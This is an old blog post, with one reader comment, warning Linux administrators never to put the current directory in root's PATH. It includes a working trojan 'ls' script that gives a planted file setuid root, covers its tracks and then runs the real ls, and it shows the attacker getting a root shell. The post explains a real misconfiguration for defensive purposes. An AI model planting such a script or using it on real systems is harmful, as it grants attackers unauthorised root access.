Never ever ever put the CWD in your PATH

December 8th, 2006

I recently had a discussion with someone who requested that I put the current working directory, . in their PATH. Luckily, they did not know how to do this themselves. Here is why its absolutely unacceptable to put the CWD in your path:

Lets say a malicious user, brock, has placed two files in the /tmp directory:

[root@www tmp]# ls -l
-rwxr-xr-x 1 brock brock 4667 Dec 8 07:54 brock.lock
-rwxr-xr-x 1 brock brock 246 Dec 8 08:04 ls

Also, the user root has placed . in their PATH:

[root@www tmp]# echo $PATH
/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin:/usr/X11R6/bin:/root/bin
[root@www tmp]# export PATH=.:$PATH
[root@www tmp]# echo $PATH
.:/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin:/usr/X11R6/bin:/root/bin

The file /tmp/brock.lock is named as such to seem harmless. The ls file, should attract attention, but probaly will not on a busy host. Given the conditions above, when the root is in the /tmp directory, /tmp/ls will execute instead of
/bin/ls. The contents of /tmp/ls are like so:

[root@www tmp]# cat /tmp/ls
#!/bin/bash
if [ `whoami` == root ]
then
  if [ -f /tmp/brock.lock ]
  then
  chmod 4755 /tmp/brock.lock
  chown root:root /tmp/brock.lock
  mv /tmp/brock.lock /home/brock/
  rm /tmp/ls
  fi
fi
/bin/ls $@

This script sets the setuid bit for the /tmp/brock.lock file, changes ownership to root, moves the file to brocks’ home directory, deletes itself, and finally runs the expected command. Thus, the root user will NEVER know they executed the script instead of /bin/ls! Look:

[root@www tmp]# pwd
/tmp
[root@www tmp]# ls -l
[root@www tmp]# ls -l /home/brock/
-rwsr-xr-x 1 root root 4667 Dec 8 07:54 brock.lock

The script executed. Thus now the brock.lock file has the setuid bit and is owned by root. It is also executable by all users. What happens now? The brock.lock file is a specially crafted file which when run with root privileges (that is with the setuid bit and having root ownership) spawns a root shell. root has just given root access to brock without knowing it. The host has been owned. See below:

[root@www tmp]# su - brock
brock@www:~$ ./brock.lock
sh-3.00# whoami
root

Category: Shell
1 Comment »

One Response to “Never ever ever put the CWD in your PATH”

  1. Sitwon Says:
    July 9th, 2009 at 1:27 pm

    On Slackware, CWD is added to the path by default for all non-root users, but it’s the last entry so the current directory is only checked as a last resort.

    In your example, if you had done PATH=$PATH:. it would have found /bin/ls first and the malicious ls wouldn’t have been executed.

Leave a Reply

If Wordpress eats your comment (shell output, loops, ex..) brock (at) gmail dot com.